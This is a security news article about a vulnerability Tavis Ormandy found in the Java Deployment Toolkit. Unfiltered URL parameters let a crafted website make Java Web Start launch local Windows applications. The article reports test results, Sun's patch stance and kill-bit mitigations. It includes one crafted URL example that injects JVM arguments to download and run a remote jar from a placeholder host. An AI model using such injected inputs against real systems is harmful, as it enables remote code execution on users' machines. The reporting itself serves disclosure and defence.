Java exploit launches local Windows applications
Tavis Ormandy has discovered a security vulnerability in the Java Deployment Toolkit (JDT) which can be exploited to launch arbitrary applications on a Windows system using a crafted website. The vulnerability could, for example, be used to download and run a trojan via FTP. JDT has been installed as part of Java since Java 6 Update 10. It is intended to make it easier for developers to distribute applications. According to Ormandy, the problem is the result of insufficient filtering of URLs, allowing arbitrary parameters to be fed to Java Web Start (JWS). JWS is able to download external Java applications using the Java Network Launching Protocol (JNLP) and run them in the VM.
By feeding crafted URLs (e.g. http: -J-jar -J\\\\www.example.com\\exploit.jar none) to the launch function, it is possible to download additional Java code and cause the Java VM to launch local applications with the user's privileges. Ormandy has published a demo exploit which downloads the file calc.jar, which launches the calculator from the command line.
In a quick test carried out by the heise Security editorial team, on a system running Windows XP, Java 6 Update 18 and Internet Explorer 8, it did indeed launch the calculator. On a Windows 7 system with IE 8, however, the Java VM merely displayed an error message. The exploit is also reported to work with Firefox (under Windows), but failed to do so in our tests.
Ormandy says he has informed Sun (now Oracle) of the problem. According to his report, Sun did not consider the vulnerability to be sufficiently critical to release an emergency patch outside of its three-month patch cycle. Until an update is released, Ormandy is advising users to set the kill bit for the JDT ActiveX control. This can either be performed manually, as described by Microsoft, or rather more simply using the AxBan tool. The CLSID for the control is CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. For Firefox, restricting access to npdeploytk.dll should block the exploit.
- Java Deployment Toolkit Performs Insufficient Validation of Parameters, security advisory from Tavis Ormandy.